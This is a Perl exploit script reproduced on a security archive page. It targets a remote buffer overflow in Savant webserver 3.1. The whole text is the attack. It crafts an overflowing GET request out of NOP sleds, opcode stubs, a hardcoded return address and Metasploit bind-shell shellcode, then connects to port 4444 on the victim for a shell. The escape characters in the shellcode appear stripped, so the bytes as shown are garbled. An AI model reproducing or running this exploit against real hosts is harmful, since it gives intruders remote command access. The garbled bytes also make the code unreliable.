Home / os / solaris

savant-overflow.txt

Posted on 14 August 2007

#!/usr/bin/perl -w # exploit for Savant webserver 3.1 remote bof # shellcode bind 4444 port on target host # # # Jacopo cervini aka acaro@jervus.it # use IO::Socket; if(!($ARGV[1])) { print "Uso: savant-3.1.pl <victim> <port> "; exit; } $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "can't connect on $ARGV[0] sulla porta $ARGV[1]"; #Metasploit shellcode $shellcode = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb5". "x55x45xd4x83xebxfcxe2xf4x49x3fxaex99x5dxacxbax2b". "x4ax35xcexb8x91x71xcex91x89xdex39xd1xcdx54xaax5f". "xfax4dxcex8bx95x54xaex9dx3ex61xcexd5x5bx64x85x4d". "x19xd1x85xa0xb2x94x8fxd9xb4x97xaex20x8ex01x61xfc". "xc0xb0xcex8bx91x54xaexb2x3ex59x0ex5fxeax49x44x3f". "xb6x79xcex5dxd9x71x59xb5x76x64x9exb0x3ex16x75x5f". "xf5x59xcexa4xa9xf8xcex94xbdx0bx2dx5axfbx5bxa9x84". "x4ax83x23x87xd3x3dx76xe6xddx22x36xe6xeax01xbax04". "xddx9exa8x28x8ex05xbax02xeaxdcxa0xb2x34xb8x4dxd6". "xe0x3fx47x2bx65x3dx9cxddx40xf8x12x2bx63x06x16x87". "xe6x06x06x87xf6x06xbax04xd3x3dx54x88xd3x06xccx35". "x20x3dxe1xcexc5x92x12x2bx63x3fx55x85xe0xaax95xbc". "x11xf8x6bx3dxe2xaax93x87xe0xaax95xbcx50x1cxc3x9d". "xe2xaax93x84xe1x01x10x2bx65xc6x2dx33xccx93x3cx83". "x4ax83x10x2bx65x33x2fxb0xd3x3dx26xb9x3cxb0x2fx84". "xecx7cx89x5dx52x3fx01x5dx57x64x85x27x1fxabx07xf9". "x4bx17x69x47x38x2fx7dx7fx1exfex2dxa6x4bxe6x53x2b". "xc0x11xbax02xeex02x17x85xe4x04x2fxd5xe4x04x10x85". "x4ax85x2dx79x6cx50x8bx87x4ax83x2fx2bx4ax62xbax04". "x3ex02xb9x57x71x31xbax02xe7xaax95xbcx45xdfx41x8b". "xe6xaax93x2bx65x55x45xd4"; $nop="x90"x201; $incbh="xfexc7"x4; # inc bh opcode $incebx="x43"x23; # inc ebx opcode $asm1 = "x53xc3"; # push ebx,ret opcode $nop1="x90"x19; $asm = "x83xc4x8cx54xc3"; # add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are # some opcode not allowed and we have need of space for our shellcode $nop2="x90"x210; $eip = "x74x86x41"; # 0x00418674 memory address of pop eax, ret in Savant.exe it's universal $exploit = $asm. " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ." " .$nop2.$shellcode; print $victim $exploit; print " + Malicious GET request sent ... "; print "Done. "; close($victim); $host = $ARGV[0]; print " + connect to 4444 of $host ... "; sleep(3); system("telnet $host 4444"); exit;

 

TOP